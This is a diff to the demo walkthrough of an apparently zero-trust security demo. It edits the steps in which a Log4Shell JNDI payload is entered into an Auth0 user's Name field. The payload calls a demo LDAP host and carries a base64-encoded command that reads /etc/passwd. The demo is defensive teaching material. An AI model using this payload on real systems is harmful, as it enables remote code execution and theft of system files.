tetratelabs/zta-demo-2022/DEMO.md

 * In the Auth0 amnagement console, go to **Users Management > Users**.
 Select your user and **Edit** the **Name** field.
   Put the following value and save: `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}`
-* Open a new Browser window in incognito mode (to make sure there are no cookies, etc) adn log in again.
-You'll see a normal
+* In the browser, go to the `/logout` path to go back to the login screen to get a new token.
-  output:
+* Log in again.
+You'll see a normal output:
   ```
   Welcome, ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}!
   Accessing: /